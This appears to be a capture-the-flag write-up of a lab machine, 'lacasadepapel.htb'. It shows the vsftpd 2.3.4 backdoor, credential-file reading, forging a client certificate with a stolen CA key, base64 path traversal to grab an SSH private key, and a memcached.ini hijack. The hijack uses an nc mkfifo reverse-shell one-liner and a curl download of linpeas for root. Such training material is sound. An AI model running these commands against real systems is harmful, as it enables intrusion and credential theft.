$nmap-sC-sV-oAnmapscan10.10.10.131# -sC : Scan with default NSE scripts.# -sV : Attempts to determine the version of the service running on port # -oA : Output in the three major formats at oncePORTSTATESERVICEVERSION21/tcpopenftpvsftpd2.3.422/tcpopensshOpenSSH7.9 (protocol 2.0)80/tcpopenhttpNode.js (Express middleware)443/tcpopenssl/httpNode.jsExpressframework
HTTP 80/tcp
playing around with the site seems we can't pull anything.
view-source : doesn't have any special information.
Robots.txt : We can’t connect to the server at lacasadepel.htb. so let's add the domain to /etc/hosts
Why the website doesn't trust my certificate?
After searching it turns out we need to have a certificate from the root.
Now "Accept the risk and continue"
Now we need a certificate from the host
FTP 21/tcp : vsftpd 2.3.4
Let's see is this version is vulnerable or not. For fast search i use searchsploit. And it seemes there is a Metasploit module for it . Since my approach is OSCP so i won't use metasploit.
So to run vsf_sysutil_extra() you have to login with a smily face :)
that means in hex \x3A\x29\ (ASCII-Code).
This function was placed in sysdeputil.c file and that file is for Highly system dependent utilities - e.g. authentication, capabilities. Reading that file says that that function opens a new TCP socket listening on port 6200 and span a shell when connected to this port
$telnet10.10.10.13121Trying10.10.10.131...Connectedto10.10.10.131.Escapecharacteris'^]'.220 (vsFTPd 2.3.4)USER:)331Pleasespecifythepassword.PASSsmile# if it waiting that means that the backdoor has opened
Psy Shell
# Connect to the shell$nc10.10.10.1316200PsyShellv0.9.9 (PHP 7.2.10—cli) by Justin HilemanhelphelpShowalistofcommands.Type`help [foo]`for information about [foo]. Aliases: ?lsListlocal,instanceorclassvariables,methodsandconstants.Aliases:list,dirdumpDumpanobjectorprimitive.docReadthedocumentationforanobject,class,constant,methodorproperty.Aliases:rtfm,manshowShowthecodeforanobject,class,constant,methodorproperty.wtfShowthebacktraceofthemostrecentexception.Aliases:last-exception,wtf?whereamiShowwhereyouareinthecode.throw-upThrowanexceptionorerroroutofthePsyShell.timeitProfileswithatimer.traceShowthecurrentcallstack.bufferShow (or clear) the contents of the code input buffer. Aliases: buf clearClearthePsyShellscreen.editOpenanexternaleditor.Afterwards,getproducedcodeininputbuffer.sudoEvaluatePHPcode,bypassingvisibilityrestrictions.historyShowthePsyShellhistory.Aliases:histexitEndthecurrentsessionandreturntocaller.Aliases:quit,qlsVariables: $tokyowhereamiFromphar:///usr/bin/psysh/src/functions.php:307:302| $config['colorMode']=Configuration::COLOR_MODE_FORCED;303| } elseif ($input->getOption('no-color')) {304| $config['colorMode']=Configuration::COLOR_MODE_DISABLED;305| }306|>307| $shell =newShell(newConfiguration($config));308|309|310|if ($usageException !==null|| $input->getOption('help')) {311|if ($usageException !==null) {312|echo $usageException->getMessage() .PHP_EOL.PHP_EOL;# Since this is a php we can use php functions to enumerateget_current_user()=> "root"scandir("/root") PHPWarning:scandir(/root):failedtoopendir:Permissiondeniedinphar://eval()'d code on line 1'scandir("/home")=> [".","..","berlin","dali","nairobi","oslo","professor", ]scandir("/home/berlin")=> [".","..",".ash_history",".ssh","downloads","node_modules","server.js","user.txt", ]scandir("/home/berlin/downloads")=> [".","..","SEASON-1","SEASON-2","Select a season", ]scandir("/home/berlin/downloads/SEASON-1/")=> [".","..","01.avi","02.avi","03.avi","04.avi","05.avi","06.avi","07.avi","08.avi","09.avi","10.avi","11.avi","12.avi","13.avi","Donwload a video", ]# when trying to file_get_contents we get nothingscandir("/home/berlin/downloads/SEASON-2/") => [".","..","01.avi","02.avi","03.avi","04.avi","05.avi","06.avi","07.avi","08.avi","09.avi","Donwload a video", ]# when trying to file_get_contents we get nothing# when trying to file_get_contents to "Select a season" we get nothingscandir("/home/berlin/.ssh")PHPWarning:scandir(/home/berlin/.ssh):failedtoopendir:Permissiondeniedinphar://eval()'d code on line 1'echofile_get_contents("/home/berlin/user.txt")PHPWarning:file_get_contents(/home/berlin/user.txt):failedtoopenstream:Permissiondeniedinphar://eval()'d code on line 1'scandir("/home/dali")=> [".","..",".ash_history",".config",".qmail-default",".ssh","server.js", ]scandir("/home/dali/.ssh")=> [".","..","authorized_keys","known_hosts", ]echofile_get_contents("/home/dali/.ssh/authorized_keys")ssh-rsaAAAAB3NzaC1yc2EAAAABIwAAAQEAsDHKXtzjeyuWjw42RbtoDy2c6lWdtfEzsmqmHrbJDY2hDcKWekWouWhe/NTCQFim6weKtsEdTzh0Qui+6jKc8/ZtpKzHrXiSXSe48JwpG7abmp5iCihzDozJqggBNoAQrvZqBhg6svcKh8F0kTnxUkBQgBm4kjOPteN+TfFoNIod7DQ72/N25D/lVThCLcStbPkR8fgBz7TGuTTAsNFXVwjlsgwi2qUF9UM6C1JkMBk5Y9ssDHiu4R35R5eCl4EEZLL946n/Gd5QB7pmIRHMkmt2ztOaKU4xZthurZpDXt+Et+Rm3dAlAZLO/5dwjqIfmEBS1eQ4sT8hlUkuLvjUDw==thek@ThekMac.localechofile_get_contents("/home/dali/.ssh/known_hosts")127.0.0.1ecdsa-sha2-nistp256AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNli8Xx10a0s+zrkT1eVfM1kRaAQaK+a/mxYxhPxpK0094QFQBcVrvrXb3+j4M8l2G/C9CtQRWVXpX8ajWhYRik=echofile_get_contents("/home/dali/.qmail-default")|bouncesayingThis\ address\ no\ longer\ accepts\ mail.echofile_get_contents("/home/dali/server.js")constnet=require('net')constspawn=require('child_process').spawnconstserver=net.createServer(function(socket) {constsh=spawn('/usr/bin/psysh')sh.stdin.resume()sh.stdout.on('data',function (data) {socket.write(data) })sh.stderr.on('data',function (data) {socket.write(data) })socket.on('data',function (data) {try{sh.stdin.write(data) }catch(e) {socket.end() } })socket.on('end',function () { })socket.on('error',function () { })});server.listen(6200,'0.0.0.0');# This server.js file allows any client that can connect to port 6200 on the host machine to interact # with a PHP interactive shell (psysh).scandir("/home/nairobi")=> [".","..","ca.key","download.jade","error.jade","index.jade","node_modules","server.js","static", ]echofile_get_contents("/home/nairobi/server.js")PHPWarning:file_get_contents(/home/nairobi/server.js):failedtoopenstream:Permissiondeniedinphar://eval()'d code on line 1'echofile_get_contents("/home/nairobi/ca.key")-----BEGINPRIVATEKEY-----MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDPczpU3s4Pmwdb...snip...53udBEzjt3WPqYGkkDknVhjD-----ENDPRIVATEKEY-----scandir("/home/oslo/")=> [".","..","Maildir","inbox.jade","index.jade","node_modules","package-lock.json","server.js","static", ]scandir("/home/professor")=> [".","..",".ash_history",".ssh","memcached.ini","memcached.js","node_modules", ]scandir("/home/professor/.ssh")PHPWarning:scandir(/home/professor/.ssh):failedtoopendir:Permissiondeniedinphar://eval()'d code on line 1'echofile_get_contents("/home/professor/memcached.ini")[program:memcached]command=sudo-unobody/usr/bin/node/home/professor/memcached.js# that could be used to privilege escalation# users?echofile_get_contents("/etc/passwd")root:x:0:0:root:/root:/bin/ashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/usr/lib/news:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologinoperator:x:11:0:operator:/root:/bin/shman:x:13:15:man:/usr/man:/sbin/nologinpostmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologincron:x:16:16:cron:/var/spool/cron:/sbin/nologinftp:x:21:21::/var/lib/ftp:/sbin/nologinsshd:x:22:22:sshd:/dev/null:/sbin/nologinat:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologinsquid:x:31:31:Squid:/var/cache/squid:/sbin/nologinxfs:x:33:33:XFontServer:/etc/X11/fs:/sbin/nologingames:x:35:35:games:/usr/games:/sbin/nologinpostgres:x:70:70::/var/lib/postgresql:/bin/shcyrus:x:85:12::/usr/cyrus:/sbin/nologinvpopmail:x:89:89::/var/vpopmail:/sbin/nologinntp:x:123:123:NTP:/var/empty:/sbin/nologinsmmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologinguest:x:405:100:guest:/dev/null:/sbin/nologinnobody:x:65534:65534:nobody:/:/sbin/nologinchrony:x:100:101:chrony:/var/log/chrony:/sbin/nologindali:x:1000:1000:dali,,,:/home/dali:/usr/bin/psyshberlin:x:1001:1001:berlin,,,:/home/berlin:/bin/ashprofessor:x:1002:1002:professor,,,:/home/professor:/bin/ashvsftp:x:101:21:vsftp:/var/lib/ftp:/sbin/nologinmemcached:x:102:102:memcached:/home/memcached:/sbin/nologin# copy and save this file
now we have /etc/passwd (list of the users) and ca.key , but what is ca.key do?
that means with ca.key we can generate certificate for ourself and conncet to port 443
Why do we need a certificate?
when you connect to a website via HTTPS, the server sends its SSL/TLS certificate to your browser. Your browser verifies the certificate and, if valid, establishes an encrypted session with the server. This ensures that the communication between the client and the server is secure.
In mutual TLS (mTLS), the client (e.g., your browser) must also present its own certificate to the server. This adds an extra layer of authentication because both sides are proving their identity through certificates. For the server to trust the client’s certificate, the client certificate must be signed by a trusted Certificate Authority (CA). The server checks this certificate just like the client checks the server’s certificate in traditional TLS.
If you can obtain the CA’s private key, you could generate a valid client certificate, allowing you to authenticate to the server.
Generate client certificate with ca.key
# Create Client Key$opensslgenrsa-outclient.key4096# Create the signing (csr)$opensslreq-new-keyclient.key-outclient.csr-----CountryName (2 lettercode) [AU]:USStateorProvinceName (full name) [Some-State]:USLocalityName (eg, city) []:USOrganizationName (eg, company) [Internet Widgits Pty Ltd]:USOrganizationalUnitName (eg, section) []:UsCommonName (e.g. serverFQDNorYOURname) []:USEmailAddress []:US@US.com Pleaseenterthefollowing'extra'attributestobesentwithyourcertificaterequestAchallengepassword []:Anoptionalcompanyname []:# just enter for no password # Sign the CSR to create a client certificate$opensslx509-req-inclient.csr-CAlacasadepapel-htb.pem-CAkeyca.key-CAcreateserial-outclient.crt-days365-sha256Certificaterequestself-signatureoksubject=C=US, ST=US, L=US, O=US, OU=Us, CN=US, emailAddress=US@US.com# now we have client.crt but we need to import this into firefox so we will create PKCS#12 (.p12) fileopensslpkcs12-export-inkeyclient.key-inclient.crt-outclient.p12EnterExportPassword:Verifying-EnterExportPassword:# enter for now password
Import client.p12 in firefox
Now let's see can we view the website
press OK and now we can continue our enumertaion for this
SSL/HTTP 443 again
This looks like /home/berlin/downloads , so lets try to download the files and see what is in it
# (1) for season 2 $ls-la|grep.avi-rw-rw-r--1kalikali0Oct1121:2601(1).avi-rw-rw-r--1kalikali0Oct1121:2601.avi-rw-rw-r--1kalikali0Oct1121:2602(1).avi-rw-rw-r--1kalikali0Oct1121:2602.avi-rw-rw-r--1kalikali0Oct1121:2603(1).avi-rw-rw-r--1kalikali0Oct1121:2603.avi-rw-rw-r--1kalikali0Oct1121:2604(1).avi-rw-rw-r--1kalikali0Oct1121:2604.avi-rw-rw-r--1kalikali0Oct1121:2605(1).avi-rw-rw-r--1kalikali0Oct1121:2605.avi-rw-rw-r--1kalikali0Oct1121:2606(1).avi-rw-rw-r--1kalikali0Oct1121:2606.avi-rw-rw-r--1kalikali0Oct1121:2607(1).avi-rw-rw-r--1kalikali0Oct1121:2607.avi-rw-rw-r--1kalikali0Oct1121:2608(1).avi-rw-rw-r--1kalikali0Oct1121:2608.avi-rw-rw-r--1kalikali0Oct1121:2609(1).avi-rw-rw-r--1kalikali0Oct1121:2609.avi-rw-rw-r--1kalikali0Oct1121:2610.avi-rw-rw-r--1kalikali0Oct1121:2611.avi-rw-rw-r--1kalikali0Oct1121:2612.avi-rw-rw-r--1kalikali0Oct1121:2613.avi# all the files are empty
unfortunately we can't download id_rsa like we have downloaded the episodes that didn't work ... wait a second how we even download it
# looking at urls , we see it slightly changeshttps://lacasadepapel.htb/file/U0VBU09OLTEvMDEuYXZphttps://lacasadepapel.htb/file/U0VBU09OLTEvMDIuYXZphttps://lacasadepapel.htb/file/U0VBU09OLTEvMDMuYXZphttps://lacasadepapel.htb/file/U0VBU09OLTEvMDQuYXZphttps://lacasadepapel.htb/file/U0VBU09OLTEvMDUuYXZp
now we need to analyze what is that string says
so this is base64 encoded string by that format SEASON/01.avi, now we will try to pull id_rsa with this method.
We will use the same site to decode this "../.ssh/id_rsa" -> Li4vLnNzaC9pZF9yc2E=
# now we will get the file$curlhttps://lacasadepapel.htb/file/Li4vLnNzaC9pZF9yc2E=curl: (60) server verification failed: certificate signer not trusted. (CAfile:/etc/ssl/certs/ca-certificates.crtCRLfile:none)# to solve this add -k$curl-khttps://lacasadepapel.htb/file/Li4vLnNzaC9pZF9yc2E=-----BEGINOPENSSHPRIVATEKEY-----b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAACFwAAAAdzc2gtcn...snip...X3a0iF5JE3kAAAAYYmVybGluQGxhY2FzYWRlcGFwZWwuaHRiAQID-----ENDOPENSSHPRIVATEKEY-----# save it to id_rsa$curl-khttps://lacasadepapel.htb/file/Li4vLnNzaC9pZF9yc2E=>id_rsa# and now let try to login$ssh-iid_rsaberlin@10.10.10.131berlin@10.10.10.131spassword:# seems like this is not for berlin, its for another user. and since we have passwd we can see which user we can login with$catpasswd|grepashroot:x:0:0:root:/root:/bin/ashberlin:x:1001:1001:berlin,,,:/home/berlin:/bin/ashprofessor:x:1002:1002:professor,,,:/home/professor:/bin/ash# trying root for greedy but same result as berlin so its professor$ssh-iid_rsaprofessor@10.10.10.131@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@WARNING:UNPROTECTEDPRIVATEKEYFILE!@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@Permissions0664for'id_rsa'aretooopen.ItisrequiredthatyourprivatekeyfilesareNOTaccessiblebyothers.Thisprivatekeywillbeignored.Loadkey"id_rsa":badpermissionsprofessor@10.10.10.131spassword:# to solve this use sudo$sudossh-iid_rsaprofessor@10.10.10.131______________||___/___|_________|_ \ ___|_ \ _________||||/_|||/_/__|/_|||||/_ \ ||_) / _ |_ \ /_ \ |||__| (_||||__| (_|\__ \ (_||||_||__/|__/ (_|||_) |__/||_____\__,_|\____\__,_|___/\__,_||____/ \___||_|\__,_|.__/ \___|_||_|lacasadepapel [~]$ iduid=1002(professor) gid=1002(professor) groups=1002(professor)lacasadepapel [~]$ pwd/home/professorlacasadepapel [~]$ lsmemcached.inimemcached.jsnode_modules
# what is my ip?$ifconfigtun0tun0:flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>mtu1500inet10.10.16.8netmask255.255.254.0destination10.10.16.8# inet is ipv4 # To transfer the file we will create python web server and download from it$python3-mhttp.server8000ServingHTTPon0.0.0.0port8000 (http://0.0.0.0:8000/) ...# now download the file from lacasadepapel [~]$ curl http://10.10.16.8:8000/linpeas.sh -o peas.sh%Total%Received%XferdAverageSpeedTimeTimeTimeCurrentDloadUploadTotalSpentLeftSpeed100318k100318k00266k00:00:010:00:01--:--:--266klacasadepapel [~]$ chmod +x peas.shlacasadepapel [~]$ ./peas.sh================================( Processes,Cron,Services,Timers&Sockets )================================5496nobody0:27/usr/bin/node/home/professor/memcached.js# this file belongs to professor folderlacasadepapel [~]$ ls -latotal344drwxr-sr-x4professorprofessor4096Oct1202:24.drwxr-xr-x7rootroot4096Feb162019..lrwxrwxrwx1rootprofessor9Nov62018.ash_history ->/dev/nulldrwx------2professorprofessor4096Jan312019.ssh-rw-r--r--1rootroot88Jan292019memcached.ini-rw-r-----1rootnobody434Jan292019memcached.jsdrwxr-sr-x9rootprofessor4096Oct32022node_modules-rwxr-xr-x1professorprofessor325864Oct1202:24peas.sh# we can't read memcached.js but we can read memcached.inilacasadepapel [~]$ cat memcached.ini [program:memcached]command=sudo-unobody/usr/bin/node/home/professor/memcached.js# since .js file is being used that means .ini is being used too! and that file can run things as sudo # but we can't write to it since we are not the one who created it (root)# but we own the folder :) we can create the same rename it or even delete it (for best practice don't delete)lacasadepapel [~]$ mv memcached.ini memcached.oldlacasadepapel [~]$ lsmemcached.jsmemcached.oldnode_modulespeas.sh# now create Reverse Shell and run it with .ini file
We will use revshells site
# setup a listener$nc-lvnp6868# create the shell file and memcached.inilacasadepapel [~]$ cd /tmp/lacasadepapel [/tmp]$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.8 6868 >/tmp/f'>> shell.shTry'chmod --help'formoreinformation.lacasadepapel [/tmp]$ chmod +x shell.sh lacasadepapel [/tmp]$ cd ~# since there is no nano or vim we will use vi and to save files in vi press ESC button and :wqlacasadepapel [~]$ vi memcached.ini[program:memcached]command=su-c/tmp/shell.sh# and now wait for a connect to your ncconnectto [10.10.16.8] from (UNKNOWN) [10.10.10.131] 41927/bin/sh:can't access tty; job control turned off/ # /bin/sh: fa: not found/ # iduid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)/ # wc /home/berlin/user.txt 1 1 33 /home/berlin/user.txt/ # wc /root/root.txt 1 1 33 /root/root.txt